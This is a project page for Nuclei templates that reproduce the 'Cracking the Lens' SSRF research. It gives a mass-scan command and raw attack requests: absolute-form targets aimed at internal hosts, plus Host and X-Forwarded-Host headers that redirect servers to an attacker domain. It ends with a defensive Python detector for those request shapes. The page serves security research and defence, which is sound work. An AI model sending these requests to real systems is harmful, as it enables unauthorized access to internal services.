
0xAwali / Blind-SSRF

Licence: other
Nuclei Templates to reproduce Cracking the lens's Research

Projects that are alternatives of or similar to Blind-SSRF

Virtual-Host
Modified Nuclei Templates Version to FUZZ Host Header
Stars: ✭ 38 (-65.77%)
Mutual labels:  web-security, nuclei, bugbounty, ssrf, nuclei-templates
nerdbug
Full Nuclei automation script with logic explanation.
Stars: ✭ 153 (+37.84%)
Mutual labels:  nuclei, bugbounty, nuclei-templates
cent
Community edition nuclei templates, a simple tool that allows you to organize all the Nuclei templates offered by the community in one place
Stars: ✭ 315 (+183.78%)
Mutual labels:  nuclei, bugbounty, nuclei-templates
Bbrecon
Python library and CLI for the Bug Bounty Recon API
Stars: ✭ 169 (+52.25%)
Mutual labels:  web-security, bugbounty
ncl
nuclei framework scripts
Stars: ✭ 25 (-77.48%)
Mutual labels:  nuclei, nuclei-templates
Priest
Extract server and IP address information from Browser SSRF
Stars: ✭ 13 (-88.29%)
Mutual labels:  bugbounty, ssrf
Eagle
Multithreaded Plugin based vulnerability scanner for mass detection of web-based applications vulnerabilities
Stars: ✭ 85 (-23.42%)
Mutual labels:  bugbounty, ssrf
Minesweeper
A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 23000 malicious cryptocurrency mining domains (cryptojacking).
Stars: ✭ 162 (+45.95%)
Mutual labels:  web-security, bugbounty
continuous-nuclei
Running nuclei Continuously
Stars: ✭ 45 (-59.46%)
Mutual labels:  nuclei, bugbounty
my-nuclei-templates
Some contributions in the nuclei-templates repository
Stars: ✭ 32 (-71.17%)
Mutual labels:  nuclei, nuclei-templates
requests-ip-rotator
A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.
Stars: ✭ 323 (+190.99%)
Mutual labels:  web-security, bugbounty
WDIR
Good resources about web security that I have read.
Stars: ✭ 14 (-87.39%)
Mutual labels:  web-security, bugbounty
magicRecon
MagicRecon is a powerful shell script to maximize the recon and data collection process of an objective and finding common vulnerabilities, all this saving the results obtained in an organized way in directories and with various formats.
Stars: ✭ 478 (+330.63%)
Mutual labels:  nuclei, bugbounty
ObserverWard 0x727
Cross platform community web fingerprint identification tool
Stars: ✭ 529 (+376.58%)
Mutual labels:  nuclei, nuclei-templates
Resources For Beginner Bug Bounty Hunters
A list of resources for those interested in getting started in bug bounties
Stars: ✭ 7,185 (+6372.97%)
Mutual labels:  web-security, ssrf
Pinaak
A vulnerability fuzzing tool written in bash, it contains the most commonly used tools to perform vulnerability scan
Stars: ✭ 69 (-37.84%)
Mutual labels:  nuclei, bugbounty
leaky-paths
A collection of special paths linked to major web CVEs, known misconfigurations, juicy APIs ..etc. It could be used as a part of web content discovery, to scan passively for high-quality endpoints and quick-wins.
Stars: ✭ 507 (+356.76%)
Mutual labels:  nuclei, bugbounty
Favfreak
Making Favicon.ico based Recon Great again !
Stars: ✭ 564 (+408.11%)
Mutual labels:  web-security, bugbounty
Awesome Bugbounty Tools
A curated list of various bug bounty tools
Stars: ✭ 96 (-13.51%)
Mutual labels:  web-security, bugbounty
Domxssscanner
DOMXSS Scanner is an online tool to scan source code for DOM based XSS vulnerabilities
Stars: ✭ 181 (+63.06%)
Mutual labels:  web-security

Nuclei templates to reproduce the Cracking the Lens research

Requirements

1 - Read and watch!

Cracking the Lens research

2 - Install Nuclei

Nuclei

3 - Clone this Repository

Blind SSRF

Usage

sed -i -- 's/- "Your Match"/- "Match Response of Your Domain e.g. <title>Title My Server 0xAwali<\/title>"/' *.yaml
nuclei -c 300 -list url.txt -bulk-size 50 -retries 3 -timeout 20 -t "/Templates/*.yaml" -var "MY-DOMAIN=domain.com"

Keep in mind

Don't use {{interactsh-url}}: I noticed that a lot of interactions take time to happen, so you will miss a lot.

Next step!

If nuclei matched something, you have a complete (non-blind) SSRF.

If nuclei didn't match anything but an HTTP interaction did happen, you may have a blind SSRF.

In that case, invest some time and use this blog post as a reference:

assetnote

A Glossary of Blind SSRF Chains

Results

1 - Complete SSRF

GET http://internal-domains.company.com/ HTTP/1.1
Host: company.com
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*

(SSRF screenshots)

GET http://internal-domains.company.com/ HTTP/1.0
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*

2 - Blind SSRF, but no luck hitting internal services

GET / HTTP/1.1
Host: company.com @MY-Domain   # note the space between company.com and @
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*

(SSRF screenshots)

GET / HTTP/1.1
Host: company.com
X-Forwarded-Host: MY-Domain/.company.com
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
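The three request shapes above (an absolute-form request target pointing at an internal hostname, a Host header containing a space and `@`, and an X-Forwarded-Host value carrying a foreign domain) are exactly the things a defender can look for in proxy or WAF logs. The following is an added example, not code from the Blind-SSRF repository: it parses a raw HTTP request head as shown on this page and reports these indicators. The set of served domains (`TRUSTED`), the sample requests and the `collaborator.example` hostname standing in for MY-Domain are all constructed for the example.

```python
"""Flag proxy-style request targets and malformed Host / X-Forwarded-Host
headers in raw HTTP request heads (added example, not repository code)."""
import re
from urllib.parse import urlsplit

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) (HTTP/\d\.\d)$")
# A bare host[:port]: letters, digits, dots and hyphens only. Spaces, '@',
# '/' and similar characters never belong in a Host value.
HOSTNAME = re.compile(r"^[A-Za-z0-9.\-]+(?::\d{1,5})?$")

# Assumption: the domains this front end legitimately serves.
TRUSTED = {"company.com"}


def parse_request_head(raw: str):
    """Split a raw request head into (method, target, version, headers).
    Header names are lower-cased; repeated headers are kept in order."""
    lines = raw.strip("\r\n").splitlines()
    m = REQUEST_LINE.match(lines[0].strip())
    if not m:
        raise ValueError(f"bad request line: {lines[0]!r}")
    headers: dict[str, list[str]] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the head
        name, sep, value = line.partition(":")
        if not sep:
            continue  # not a header line
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return m.group(1), m.group(2), m.group(3), headers


def classify_host(value: str, trusted: set[str]) -> str:
    """'malformed' if not a bare host[:port], 'untrusted' if well-formed but
    outside the served domains, else 'ok'."""
    if not HOSTNAME.match(value):
        return "malformed"
    host = value.split(":")[0].lower().rstrip(".")
    if any(host == t or host.endswith("." + t) for t in trusted):
        return "ok"
    return "untrusted"


def find_ssrf_indicators(raw: str, trusted: set[str]) -> list[str]:
    """Return human-readable findings for one request head (empty = clean)."""
    _method, target, version, headers = parse_request_head(raw)
    findings = []
    hosts = headers.get("host", [])
    if version == "HTTP/1.1" and not hosts:
        findings.append("HTTP/1.1 request without Host header")
    if len(hosts) > 1:
        findings.append("duplicate Host headers")
    for h in hosts:
        verdict = classify_host(h, trusted)
        if verdict != "ok":
            findings.append(f"{verdict} Host header: {h!r}")
    for h in headers.get("x-forwarded-host", []):
        verdict = classify_host(h, trusted)
        if verdict != "ok":
            findings.append(f"{verdict} X-Forwarded-Host header: {h!r}")
    if target.startswith(("http://", "https://")):
        # Absolute-form targets are proxy syntax; an origin server that honours
        # them (as in the first result above) is acting as an open proxy.
        uri_host = urlsplit(target).hostname or ""
        findings.append(f"absolute-form request target for {uri_host!r}")
        if hosts and uri_host.lower() != hosts[0].split(":")[0].lower():
            findings.append(f"request-target host {uri_host!r} does not match Host {hosts[0]!r}")
    return findings


# Constructed samples mirroring the shapes shown on this page.
SAMPLES = {
    "absolute_form_1_1": "GET http://internal-domains.company.com/ HTTP/1.1\nHost: company.com\nUser-Agent: Mozilla/5.0\n",
    "absolute_form_1_0": "GET http://internal-domains.company.com/ HTTP/1.0\nUser-Agent: Mozilla/5.0\n",
    "host_with_at":      "GET / HTTP/1.1\nHost: company.com @collaborator.example\nUser-Agent: Mozilla/5.0\n",
    "xfh_foreign":       "GET / HTTP/1.1\nHost: company.com\nX-Forwarded-Host: collaborator.example/.company.com\n",
    "clean":             "GET /index.html HTTP/1.1\nHost: www.company.com\nUser-Agent: Mozilla/5.0\n",
}


def scan_all(samples: dict[str, str] = SAMPLES, trusted: set[str] = TRUSTED) -> dict[str, list[str]]:
    """Run the indicator check over every sample and map name -> findings."""
    return {name: find_ssrf_indicators(raw, trusted) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, findings in scan_all().items():
        print(name, "->", findings or "clean")
```

The `malformed` verdict deliberately fires before any domain matching: a value such as `collaborator.example/.company.com` does end with `.company.com`, so a suffix check alone would pass it, which is precisely the parsing confusion the third result exploits.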